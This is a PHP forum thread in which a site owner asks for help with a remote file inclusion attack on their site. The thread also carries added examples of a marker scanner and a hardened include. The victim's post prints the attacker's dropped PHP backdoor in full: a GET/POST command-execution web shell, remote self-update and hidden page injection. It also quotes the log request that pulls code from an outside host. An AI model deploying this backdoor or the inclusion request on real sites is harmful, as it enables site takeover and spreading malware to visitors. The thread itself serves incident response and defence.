I've got a site that it seems an IRC bot is attacking and writing an activeX virus after the <body> tags. I've been fighting this for weeks and here is what I have....

It is shared hosting, so php.ini is not available and my htaccess is limited. Register_Globals was on, today I turned it off after some extensive reading. The hacker is running code like the following found in my logs:

//phpSecurePages/secure.php?&cfgProgDir=http://rdxihx.angelfire.com/php 

where the host it's getting the file from changes each time, so blocking IPs/domains doesn't work, and I have actually deleted phpSecurePages from the site and yet this script still works. You can follow the link after cfgProgDir to read the code that it accesses; then sometimes it creates a random file with the following code

<?php
ignore_user_abort(1);
set_time_limit(0);

function Clear()
{
    unlink("c");
    unlink("1r");
  unlink("log");
}

function Clear2()
{
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
    $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); 
    $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
    $fin = ereg_replace("<!--dd4-->", "", $fin);
  $fin = ereg_replace("<!--dd5-->", "", $fin);
  $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
    echo " upt-ok";
}

function GetVar($name, &$var)
{
    $var = "";
    if (isset($_POST[$name]))
        $var = $_POST[$name];

  if (isset($_GET[$name]))
        $var = $_GET[$name];

if (($var) =="")
  return  false;
  else return true;
}

function Gen()
{
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array();
    if (isset($_POST["sg"]))
        $sg = $_POST["sg"];

  if (isset($_GET["sg"]))
        $sg = $_GET["sg"]; 

if (isset($_POST["gm"]))
  $g = $_POST["gm"];

if (isset($_GET["gm"]))
    $g = $_GET["gm"];


$path = "";
$fr = fopen("1r", "a+");
if (file_exists("c"))
{
    $fconf = file("c");
    $tname = trim($fconf[0]);
    $cname = trim($fconf[1]);
    $curs = trim($fconf[2]);
    $pid = trim($fconf[3]);
    if ($pid == 100)
    {
        $pid = 0;
        $rnd = mt_rand(0, 999);
        $nm = "";
    for ($i=0; $i<3; $i++)
      {
          $ran = mt_rand(0,26);
          $sym = $alp[$ran];
          $nm = $nm.$sym;
      }
        $cname = $nm;
        mkdir("$tname/$cname");
        $curs = $g;
    }
}
else 
{
    $rnd = mt_rand(0, 999);
    $nm = "";
  for ($i=0; $i<5; $i++)
    {
        $ran = mt_rand(0,26);
        $sym = $alp[$ran];
        $nm = $nm.$sym;
    }
    $tname = $nm;
    $pid = 0;
    $curs = $g;
    mkdir($tname);
    $fht = fopen("$tname/.htaccess", "w+");
    $htname = $sg."2.txt";
    $fp = fopen($htname, "r");
    $fin = '';
    while (!feof($fp))
    {
         $fc = fgets($fp, 1024);
         if (!$fc) break;
       $fin .= $fc;
    }
    fclose($fp);
    fwrite($fht, $fin);
    fclose($fht);
    $rnd = mt_rand(0, 999);
    $nm = "";
for ($i=0; $i<3; $i++)
  {
      $ran = mt_rand(0,26);
      $sym = $alp[$ran];
      $nm = $nm.$sym;
  }
    $cname = $nm;
mkdir("$tname/$cname");
}
  $gname = $sg."sgen.php";
    for ($j=$pid; $j<$pid+10; $j++)
    {
        $fp = fopen($gname."?g=$curs", "r");
        $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
        fclose($fp);

    $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");
    fwrite($fnd, $fin);
    fclose($fnd);
}

if ($j==100)
{
  $fp = fopen($gname."?g=$curs&m=1", "r");
    $fin = '';
    while (!feof($fp))
    {
         $fc = fgets($fp, 1024);
         if (!$fc) break;
       $fin .= $fc;
    }
    fclose($fp);
    $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");
    fwrite($fnd, $fin);
    fclose($fnd);
    $map = "$path/$tname/$cname/$curs"."_lm.htm";
    fwrite($fr,"$map\n");
}

$fconf = fopen("c", "w+");
fwrite($fconf, $tname."\n");
fwrite($fconf, $cname."\n");
fwrite($fconf, $curs."\n");
$nj = $j;
fwrite($fconf, $nj."\n");
fclose($fconf);
}

function Update()
{
    $thisname = "1.php";
    if (isset($_POST['u']))
      $u = $_POST['u'];

if (isset($_GET['u']))
     $u = $_GET['u'];

 $fp = fopen($u, "r");
  $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
  fclose($fp);

  $fthis = fopen($thisname, "w+");
  fwrite($fthis, $fin);
  fclose($fthis);
}

function Com()
{
    if (isset($_POST['c']))
      @system($_POST['c']);
  if (isset($_GET['c']))
        @system($_GET['c']);
}

function MRepl()
{
    $mpt = "";
    $drs = "";
    $begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; 
  $endtag = "</font></body></html><dd5> "; 
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    GetVar("mpt", $mpt);
     // remove the closing html tags
  $fin = preg_replace ("/<\/body>/i", "", $fin);
  $fin = preg_replace ("/<\/html>/i", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
  $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
    $fp = fopen($mpt, "r");
  $drs = '';
    while (!feof($fp))
    {
         $fc = fgets($fp, 1024);
         if (!$fc)
         {
             exit();
         }
         $drs .= $fc;
    }
    fclose($fp);
    $fin = $fin.$begtag;
    $fin = $fin.$drs;
    $fin = $fin.$endtag;
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
}

function Main()
{
    if (isset($_POST['u']) || isset($_GET['u']))
    {
        Update();
        exit();
    }
    if (isset($_POST['c']) || isset($_GET['c']))
    {
        Com();
        exit();
    }
    if (isset($_POST['g']) || isset($_GET['g']))
    {
        Gen();
        exit();
    }
    if (isset($_POST['s']) || isset($_GET['s']))
    {
        MRepl();
        exit();
    }
    if (isset($_POST['cl']) || isset($_GET['cl']))
    {
        Clear();
        exit();
    }
    if (isset($_POST['cl2']) || isset($_GET['cl2']))
    {
        Clear2();
        exit();
    }
    echo "<ok>";
}

Main();
?>

Any Help Appreciated... I'm dying here
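A scanner for the traces the posted script leaves behind, added here as an example and not part of the thread: it looks for the markers the script's MRepl()/Clear2() functions read and write (<dd4>/<dd5>, the <!--dd4--> comments, the zero-size hidden <font> wrapper, links to generated *_lm.htm pages) and for its working files c, 1r, log and m. The after_html check is a heuristic (anything following </html>) and the file names are taken from the code above.

```php
<?php
// Added example (not from the thread): scans a web root for the markers the
// posted script leaves in pages and for its working files (c, 1r, log, m).
// Usage: php scan_markers.php /path/to/htdocs
$patterns = array(
    'dd4_tag'     => '/<dd4>.*?<dd5>/is',
    'dd4_comment' => '/<!--dd4-->.*?<!--dd5-->/is',
    'hidden_font' => '/<font style="position: absolute;overflow: hidden;height: 0;width: 0">/i',
    'lm_link'     => '/<a[^>]+_lm\.htm[^>]*>/i',
    'after_html'  => '/<\/html>\s*\S/i',   // anything appended after </html>
);
$dropperFiles = array('c', '1r', 'log', 'm');

// Returns the names of the patterns found in one file (empty array if clean).
function scanFile($path, $patterns)
{
    $hits = array();
    $data = file_get_contents($path);
    if ($data === false) return $hits;
    foreach ($patterns as $name => $re) {
        if (preg_match($re, $data)) $hits[] = $name;
    }
    return $hits;
}

// Walks $dir recursively and fills $report with path => list of findings.
function scanTree($dir, $patterns, $dropperFiles, &$report)
{
    $dh = opendir($dir);
    if (!$dh) return;
    while (($entry = readdir($dh)) !== false) {
        if ($entry == '.' || $entry == '..') continue;
        $path = "$dir/$entry";
        if (is_dir($path)) {
            scanTree($path, $patterns, $dropperFiles, $report);
        } elseif (in_array($entry, $dropperFiles)) {
            $report[$path] = array('dropper_file');
        } elseif (preg_match('/\.(html?|php)$/i', $entry)) {
            $hits = scanFile($path, $patterns);
            if ($hits) $report[$path] = $hits;
        }
    }
    closedir($dh);
}

$report = array();
scanTree(isset($argv[1]) ? $argv[1] : '.', $patterns, $dropperFiles, $report);
foreach ($report as $file => $hits) {
    echo $file . ': ' . implode(', ', $hits) . "\n";
}
```

Any file flagged with dropper_file or dd4_tag should be compared against a known-clean backup rather than just edited in place, since Update() can rewrite the shell under a new name.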

    Is the "phpSecurePages/secure.php" a file on your site? If so, then it would appear to be the culprit when it comes to doing something very insecure: most likely an include/require that uses $_GET['cfgProgDir'] or $_REQUEST['cfgProgDir'] to select the file that is included without any filtering of that value. If using PHP 5.2+, you can set the allow_url_include option to 0 (which should be the default setting) and allow_url_fopen to 0 (which could have side-effects you would then have to work around via cURL or such). This would stop the possibility of including remote files. And of course you could review the "secure.php" file to find out where it is using that 'cfgProgDir' value and fix whatever it is doing to be more secure.
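The include pattern described in this reply, shown beside a hardened form, as an added example that is not code from phpSecurePages or from anyone in the thread. APP_ROOT, the lib/ directory, the file names and a Unix-style path layout are assumptions for illustration.

```php
<?php
// Added example, not code from phpSecurePages or from the thread. It shows the
// include pattern NogDog describes and one way to harden it. APP_ROOT, the
// lib/ directory and the file names are assumed for illustration.

// Vulnerable form: the directory comes from the request. With register_globals
// on, ?cfgProgDir=http://... sets $cfgProgDir directly; with it off, an
// explicit $cfgProgDir = $_GET['cfgProgDir'] has the same effect. Because
// allow_url_fopen lets include() open URLs, the remote file is fetched and run.
function loadHelperUnsafe($cfgProgDir)
{
    include($cfgProgDir . '/helpers.php');
}

// Hardened form: the directory is fixed in the script, the request may only
// pick a name from a whitelist, and the resolved path is checked to stay
// under that directory (realpath() collapses ../ and never yields a URL).
define('APP_ROOT', dirname(__FILE__));

function loadHelperSafe($name)
{
    $allowed = array('helpers.php' => true, 'config.php' => true);
    if (!isset($allowed[$name])) {
        return false;
    }
    $libDir = realpath(APP_ROOT . '/lib');
    $full = realpath(APP_ROOT . '/lib/' . $name);
    if ($libDir === false || $full === false || strpos($full, $libDir . '/') !== 0) {
        return false;
    }
    include($full);
    return true;
}

// Where php.ini is out of reach: register_globals is PHP_INI_PERDIR, so
//   php_flag register_globals off
// works in .htaccess under mod_php if the host allows it. allow_url_fopen and
// allow_url_include are PHP_INI_SYSTEM and can only be turned off by the host.
```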

      NogDog;10889840 wrote:

      Is the "phpSecurePages/secure.php" a file on your site? If so, then it would appear to be the culprit when it comes to doing something very insecure: most likely an include/require that uses $_GET['cfgProgDir'] or $_REQUEST['cfgProgDir'] to select the file that is included without any filtering of that value. If using PHP 5.2+, you can set the allow_url_include option to 0 (which should be the default setting) and allow_url_fopen to 0 (which could have side-effects you would then have to work around via cURL or such). This would stop the possibility of including remote files. And of course you could review the "secure.php" file to find out where it is using that 'cfgProgDir' value and fix whatever it is doing to be more secure.

      Thanks, but please read the post before you reply. First, the file already has been deleted; that's why I'm so lost. I'm using PHP 4, so I can't set those parameters for the file include.

        The allow_url_fopen can be set to 0 for PHP4, only the allow_url_include is PHP5.2 or later.

        Have you changed your login and FTP passwords?

        Have you notified the hosting support? (It could be someone with an account on the same host running PHP or Perl or other CGI scripts who is writing stuff into your directories.)
